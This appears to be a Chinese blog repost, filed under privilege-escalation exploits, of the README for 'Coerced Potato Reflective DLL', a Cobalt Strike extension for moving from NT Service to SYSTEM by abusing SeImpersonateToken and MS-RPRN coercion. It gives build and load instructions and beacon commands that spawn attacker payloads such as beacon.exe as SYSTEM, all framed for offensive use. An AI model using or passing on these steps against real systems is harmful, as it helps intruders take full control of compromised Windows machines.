首页 提权EXP 正文
  • 本文约689字,阅读需3分钟
  • 478
  • 0

Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege

Coerced Potato Reflective DLL

 

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based on https://github.com/Prepouce/CoercedPotato

Reflective Loader from https://github.com/stephenfewer/ReflectiveDLLInjection.

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
 

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
 

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce
 

温馨提示:本文最后更新于2024年1月10日 21:25,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论